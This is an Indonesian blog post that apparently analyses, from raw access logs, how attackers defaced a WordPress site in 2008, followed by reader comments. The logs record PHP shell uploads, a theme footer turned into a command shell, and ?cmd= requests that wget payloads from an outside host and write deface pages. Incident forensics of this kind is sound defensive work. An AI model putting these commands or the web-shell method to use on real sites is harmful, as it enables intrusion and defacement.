Mohon maaf sebelumnya atas keterlambatan posting di blog ini mengenai part 2 antihackerlink was hacked, dikarenakan kesibukan dunia nyata.:). Ok langsung saja kali ini analisa forensic dilakukan melalui raw log access server antihackerlink Disini kami sengaja hanya sediakan log access tersebut. Silahkan analisa bersama disini :).
88.237.213.52 – – [04/Dec/2008:04:52:28 +0700] “GET / HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:04:53:21 +0700] “GET /?page_id=2 HTTP/1.1″ 200 12535 ”
88.237.213.52 – – [04/Dec/2008:04:54:23 +0700] “GET / HTTP/1.1” <- “http://www.google.com/search?client=opera&rls=tr&q=antihackerlink.or.id&sourceid=opera&ie=utf-8&oe=utf-8”
88.237.213.52 – – [04/Dec/2008:05:01:50 +0700] “GET /wp-login.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:01:58 +0700] “POST /wp-login.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:01:59 +0700] “GET /wp-admin/ HTTP/1.1” <- “http://antihackerlink.or.id/wp-login.php”
88.237.213.52 – – [04/Dec/2008:05:02:06 +0700] “GET /wp-admin/edit.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:02:10 +0700] “GET /wp-admin/post.php?action=edit&post=34 HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:02:51 +0700] “GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:00 +0700] “POST /wp-admin/async-upload.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:05 +0700] “POST /wp-admin/async-upload.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:26 +0700] “POST /wp-admin/admin-ajax.php HTTP/1.1” <- “http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34”
88.237.213.52 – – [04/Dec/2008:05:03:26 +0700] “POST /wp-admin/admin-ajax.php HTTP/1.1” <- “http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34”
88.237.213.52 – – [04/Dec/2008:05:03:35 +0700] “GET /wp-content/uploads/2008/12/405.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:39 +0700] “GET /wp-content/uploads/2008/12/405.php/ HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:04:31 +0700] “GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:04:44 +0700] “POST /wp-admin/media-upload.php?type=image&tab=type&post_id=34 HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:05:18 +0700] “GET /wp-content/uploads/2008/12/403.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:05:20 +0700] “GET /wp-content/uploads/2008/12/403.php/ HTTP/1.1”
….. ……
….. ……
….. ……
….. ……
88.237.213.52 – – [04/Dec/2008:05:05:50 +0700] “GET /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:06:04 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:06:39 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:06:50 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:07:18 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:07:42 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:09:56 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:10:08 +0700] “GET /wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:11:52 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:11:53 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:11:58 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:12:00 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:12:05 +0700] “GET //wp-content/themes/illacrimo/
88.237.213.52 – – [04/Dec/2008:05:12:08 +0700] “GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 – – [04/Dec/2008:05:12:09 +0700] “GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 – – [04/Dec/2008:05:12:15 +0700] “GET //wp-content/themes/illacrimo/v454.php
—————-
88.237.213.52 – – [04/Dec/2008:05:12:54 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:13:04 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:13:08 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:13:45 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;mv%20403.txt%20z.php;ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:14:02 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:14:28 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://0d4y.org;ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:15:13 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:15:26 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia%20/home/sakitjiw/public_html/antihackerlink.or.id/ HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:15:49 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:18:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20’hacked%20ogi%20’%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:19:05 +0700] “GET /v4.php
88.237.213.52 – – [04/Dec/2008:05:20:18 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20x%20%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:20:21 +0700] “GET /v4.php
88.237.213.52 – – [04/Dec/2008:05:24:27 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:24:36 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:25:19 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo’%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:25:22 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:26:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo’Hacked%20By_Ogmass%20&%20S4S_7’%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:27:01 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:27:27 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20’%20Hacked%20By_Ogmass%20&%20S4S_7%20’%20%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:27:41 +0700] “GET / HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:17 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/; HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:45 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:49 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:51 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua HTTP/
88.237.213.52 – – [04/Dec/2008:05:29:03 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd= HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:29:08 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:29:53 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/wp-content/themes/;ls%20-lia HTTP/1.1”88.237.213.52 – – [04/Dec/2008:05:30:48 +0700] “GET /wp-admin/post-new.php HTTP/1.1”
………………………
88.237.213.52 – – [04/Dec/2008:06:46:38 +0700] “GET / HTTP/1.1″2286 “http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,By_Ogmass/”
aw aw aw aw..
bikin themes wp sendiri aja que que que
brb kabooor..benerin py gw juga sapa tau bisa kek gt
setelah baca berkali2 nggak ngerti maksudnya
WEkzz,,what is the kamsud omz fl3xu5…huehehehe..:D
88.237.213.52 – – [04/Dec/2008:05:27:27 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20′%20Hacked%20By_Ogmass%20&%20S4S_7%20′%20%3Ev4.php HTTP/1.1″
Setelah ak baca berulang², emank uda dari awal mereka menjadikan antihacerlink menjadi target yg akan mereka deface, bisa di lihat diatas mereka melihat dan mencoba² masuk di setiap file / folder dengan menggunakan teknik hacking yg beda dari biasanya org² lain lakukan. Jd klo menurut ak, mereka (defacer turki) tdk terfokus aja pada exploit publik doank, mereka memakai cara altrenatif yg uda jarang di pakai 🙂 Keren mereka. Thanks atas Part II Antihackerlink Bang fl3xu5
emang..
tersangka keliatannya bingung..
masuk direktori satu persatu..
salut buat tersangka, hha..
kaboooorr….
hohoohoh…
sakitjiwa tuh si arif ya…
ixoxioxioxioo.. ngapain dia ya?
wooh…
keren….
=========
kaboor…
@sakitjiwa : 🙂
Bro…..
apa Wp na antihackerlink tak ter update??
Oia, ngambil exploit dr http://hackzone.kiev.ua/403.txt;mv%20403.txt%20z.php;ls%20-lia kah??
Asem wp ditelen juga…
ijin copas mas buat dplajari
just as i had predicted xD~
hihihi kok liat nya langsung footer.php….
kalo menurut aku sih…..
di baca yah di http://rindho.com/?sub=view&id=9&kategori=forensic%20antihackerlink.or.id%20part%20II
😀
maap bang ,ndak ngerti
qeqe
wp ,wp ,punyaku jg gag update xixixi
@rindho
sipppppppppppppppppppppppp tq
thanks to sakitjiwa n JinX 🙂
tambahan : http://www.milw0rm.com/exploits/6421
Regards,
fl3xu5
woala..
koq bisa masuk ke google vuln nya?
pakar-pakar security emang kudu jeli nih.. ampe segitunya..
Klo disuruh baca log spt itu wadaw.. ampun deh. Baca log program aja maless.. :p
Wew, jadi dia masuk ke wp, lalu edit footer membuat bug sendiri alias membikin code RFI sendiri. Lalu dia membuka folder satu persatu gitu bang
Ini hanya kommentar sederhana lho, soalnya belum neliti lebih jauh.
ane mau ngacir dulu.
—————————————>> ngacir